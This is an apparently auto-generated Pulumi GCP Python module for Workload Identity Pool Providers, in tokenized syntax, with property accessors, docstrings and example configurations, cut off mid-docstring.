description:Optional[pulumi.Input[str]]=<none> disabled:Optional[pulumi.Input[bool]]=<none> display_name:Optional[pulumi.Input[str]]=<none> name:Optional[pulumi.Input[str]]=<none> oidc:Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]=<none> project:Optional[pulumi.Input[str]]=<none> state:Optional[pulumi.Input[str]]=<none> workload_identity_pool_id:Optional[pulumi.Input[str]]=<none> workload_identity_pool_provider_id:Optional[pulumi.Input[str]]=<none><block_start>""" Input properties used for looking up and filtering WorkloadIdentityPoolProvider resources. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[str] name: The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. :param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<if_stmt>attribute_condition<is><not><none><block_start>pulumi.set(__self__ "attribute_condition" attribute_condition)<block_end><if_stmt>attribute_mapping<is><not><none><block_start>pulumi.set(__self__ "attribute_mapping" attribute_mapping)<block_end><if_stmt>aws<is><not><none><block_start>pulumi.set(__self__ "aws" aws)<block_end><if_stmt>description<is><not><none><block_start>pulumi.set(__self__ "description" description)<block_end><if_stmt>disabled<is><not><none><block_start>pulumi.set(__self__ "disabled" disabled)<block_end><if_stmt>display_name<is><not><none><block_start>pulumi.set(__self__ "display_name" display_name)<block_end><if_stmt>name<is><not><none><block_start>pulumi.set(__self__ "name" name)<block_end><if_stmt>oidc<is><not><none><block_start>pulumi.set(__self__ "oidc" oidc)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><if_stmt>state<is><not><none><block_start>pulumi.set(__self__ "state" state)<block_end><if_stmt>workload_identity_pool_id<is><not><none><block_start>pulumi.set(__self__ "workload_identity_pool_id" workload_identity_pool_id)<block_end><if_stmt>workload_identity_pool_provider_id<is><not><none><block_start>pulumi.set(__self__ "workload_identity_pool_provider_id" workload_identity_pool_provider_id)<block_end><block_end>@property@pulumi.getter(name="attributeCondition")<def_stmt>attribute_condition self<arrow>Optional[pulumi.Input[str]]<block_start>""" [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_condition")<block_end>@attribute_condition.setter<def_stmt>attribute_condition self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "attribute_condition" value)<block_end>@property@pulumi.getter(name="attributeMapping")<def_stmt>attribute_mapping self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_mapping")<block_end>@attribute_mapping.setter<def_stmt>attribute_mapping self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "attribute_mapping" value)<block_end>@property@pulumi.getter<def_stmt>aws self<arrow>Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]<block_start>""" An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. """<line_sep><return>pulumi.get(self "aws")<block_end>@aws.setter<def_stmt>aws self value:Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]<block_start>pulumi.set(self "aws" value)<block_end>@property@pulumi.getter<def_stmt>description self<arrow>Optional[pulumi.Input[str]]<block_start>""" A description for the provider. Cannot exceed 256 characters. """<line_sep><return>pulumi.get(self "description")<block_end>@description.setter<def_stmt>description self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "description" value)<block_end>@property@pulumi.getter<def_stmt>disabled self<arrow>Optional[pulumi.Input[bool]]<block_start>""" Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """<line_sep><return>pulumi.get(self "disabled")<block_end>@disabled.setter<def_stmt>disabled self value:Optional[pulumi.Input[bool]]<block_start>pulumi.set(self "disabled" value)<block_end>@property@pulumi.getter(name="displayName")<def_stmt>display_name self<arrow>Optional[pulumi.Input[str]]<block_start>""" A display name for the provider. Cannot exceed 32 characters. """<line_sep><return>pulumi.get(self "display_name")<block_end>@display_name.setter<def_stmt>display_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "display_name" value)<block_end>@property@pulumi.getter<def_stmt>name self<arrow>Optional[pulumi.Input[str]]<block_start>""" The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. """<line_sep><return>pulumi.get(self "name")<block_end>@name.setter<def_stmt>name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "name" value)<block_end>@property@pulumi.getter<def_stmt>oidc self<arrow>Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]<block_start>""" An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. """<line_sep><return>pulumi.get(self "oidc")<block_end>@oidc.setter<def_stmt>oidc self value:Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]<block_start>pulumi.set(self "oidc" value)<block_end>@property@pulumi.getter<def_stmt>project self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@project.setter<def_stmt>project self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "project" value)<block_end>@property@pulumi.getter<def_stmt>state self<arrow>Optional[pulumi.Input[str]]<block_start>""" The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. """<line_sep><return>pulumi.get(self "state")<block_end>@state.setter<def_stmt>state self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "state" value)<block_end>@property@pulumi.getter(name="workloadIdentityPoolId")<def_stmt>workload_identity_pool_id self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_id")<block_end>@workload_identity_pool_id.setter<def_stmt>workload_identity_pool_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "workload_identity_pool_id" value)<block_end>@property@pulumi.getter(name="workloadIdentityPoolProviderId")<def_stmt>workload_identity_pool_provider_id self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_provider_id")<block_end>@workload_identity_pool_provider_id.setter<def_stmt>workload_identity_pool_provider_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "workload_identity_pool_provider_id" value)<block_end><block_end><class_stmt>WorkloadIdentityPoolProvider(pulumi.CustomResource)<block_start>@overload<def_stmt>__init__ __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> attribute_condition:Optional[pulumi.Input[str]]=<none> attribute_mapping:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> aws:Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]]=<none> description:Optional[pulumi.Input[str]]=<none> disabled:Optional[pulumi.Input[bool]]=<none> display_name:Optional[pulumi.Input[str]]=<none> oidc:Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]]=<none> project:Optional[pulumi.Input[str]]=<none> workload_identity_pool_id:Optional[pulumi.Input[str]]=<none> workload_identity_pool_provider_id:Optional[pulumi.Input[str]]=<none> __props__=<none><block_start>""" A configuration for an external identity provider. To get more information about WorkloadIdentityPoolProvider, see: * [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers) * How-to Guides * [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers) ## Example Usage ### Iam Workload Identity Pool Provider Aws Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Aws Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="AWS identity pool provider for automated test", disabled=True, attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"", attribute_mapping={ "google.subject": "assertion.arn", "attribute.aws_account": "assertion.account", "attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"", }, aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", attribute_mapping={ "google.subject": "assertion.sub", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="OIDC identity pool provider for automated test", disabled=True, attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups", attribute_mapping={ "google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub", "attribute.tid": "assertion.tid", "attribute.managed_identity_name": \"\"\" { "8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1", "55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2" }[assertion.oid] \"\"\", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( allowed_audiences=[ "https://example.com/gcp-oidc-federation", "example.com/gcp-oidc-federation", ], issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ## Import WorkloadIdentityPoolProvider can be imported using any of these accepted formats ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><ellipsis><block_end>@overload<def_stmt>__init__ __self__ resource_name:str args:WorkloadIdentityPoolProviderArgs opts:Optional[pulumi.ResourceOptions]=<none><block_start>""" A configuration for an external identity provider. To get more information about WorkloadIdentityPoolProvider, see: * [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers) * How-to Guides * [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers) ## Example Usage ### Iam Workload Identity Pool Provider Aws Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Aws Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="AWS identity pool provider for automated test", disabled=True, attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"", attribute_mapping={ "google.subject": "assertion.arn", "attribute.aws_account": "assertion.account", "attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"", }, aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", attribute_mapping={ "google.subject": "assertion.sub", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="OIDC identity pool provider for automated test", disabled=True, attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups", attribute_mapping={ "google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub", "attribute.tid": "assertion.tid", "attribute.managed_identity_name": \"\"\" { "8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1", "55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2" }[assertion.oid] \"\"\", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( allowed_audiences=[ "https://example.com/gcp-oidc-federation", "example.com/gcp-oidc-federation", ], issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ## Import WorkloadIdentityPoolProvider can be imported using any of these accepted formats ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` :param str resource_name: The name of the resource. :param WorkloadIdentityPoolProviderArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """<line_sep><ellipsis><block_end><def_stmt>__init__ __self__ resource_name:str *args **kwargs<block_start>resource_args,opts=_utilities.get_resource_args_opts(WorkloadIdentityPoolProviderArgs pulumi.ResourceOptions *args **kwargs)<if_stmt>resource_args<is><not><none><block_start>__self__._internal_init(resource_name opts **resource_args.__dict__)<block_end><else_stmt><block_start>__self__._internal_init(resource_name *args **kwargs)<block_end><block_end><def_stmt>_internal_init __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> attribute_condition:Optional[pulumi.Input[str]]=<none> attribute_mapping:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> aws:Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]]=<none> description:Optional[pulumi.Input[str]]=<none> disabled:Optional[pulumi.Input[bool]]=<none> display_name:Optional[pulumi.Input[str]]=<none> oidc:Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]]=<none> project:Optional[pulumi.Input[str]]=<none> workload_identity_pool_id:Optional[pulumi.Input[str]]=<none> workload_identity_pool_provider_id:Optional[pulumi.Input[str]]=<none> __props__=<none><block_start><if_stmt>opts<is><none><block_start>opts=pulumi.ResourceOptions()<block_end><if_stmt><not>isinstance(opts pulumi.ResourceOptions)<block_start><raise>TypeError('Expected resource options to be a ResourceOptions instance')<block_end><if_stmt>opts.version<is><none><block_start>opts.version=_utilities.get_version()<block_end><if_stmt>opts.id<is><none><block_start><if_stmt>__props__<is><not><none><block_start><raise>TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')<block_end>__props__=WorkloadIdentityPoolProviderArgs.__new__(WorkloadIdentityPoolProviderArgs)<line_sep>__props__.__dict__["attribute_condition"]=attribute_condition<line_sep>__props__.__dict__["attribute_mapping"]=attribute_mapping<line_sep>__props__.__dict__["aws"]=aws<line_sep>__props__.__dict__["description"]=description<line_sep>__props__.__dict__["disabled"]=disabled<line_sep>__props__.__dict__["display_name"]=display_name<line_sep>__props__.__dict__["oidc"]=oidc<line_sep>__props__.__dict__["project"]=project<if_stmt>workload_identity_pool_id<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'workload_identity_pool_id'")<block_end>__props__.__dict__["workload_identity_pool_id"]=workload_identity_pool_id<if_stmt>workload_identity_pool_provider_id<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'workload_identity_pool_provider_id'")<block_end>__props__.__dict__["workload_identity_pool_provider_id"]=workload_identity_pool_provider_id<line_sep>__props__.__dict__["name"]=<none><line_sep>__props__.__dict__["state"]=<none><block_end>super(WorkloadIdentityPoolProvider __self__).__init__('gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider' resource_name __props__ opts)<block_end>@staticmethod<def_stmt>get resource_name:str id:pulumi.Input[str] opts:Optional[pulumi.ResourceOptions]=<none> attribute_condition:Optional[pulumi.Input[str]]=<none> attribute_mapping:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> aws:Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]]=<none> description:Optional[pulumi.Input[str]]=<none> disabled:Optional[pulumi.Input[bool]]=<none> display_name:Optional[pulumi.Input[str]]=<none> name:Optional[pulumi.Input[str]]=<none> oidc:Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]]=<none> project:Optional[pulumi.Input[str]]=<none> state:Optional[pulumi.Input[str]]=<none> workload_identity_pool_id:Optional[pulumi.Input[str]]=<none> workload_identity_pool_provider_id:Optional[pulumi.Input[str]]=<none><arrow>'WorkloadIdentityPoolProvider'<block_start>""" Get an existing WorkloadIdentityPoolProvider resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the 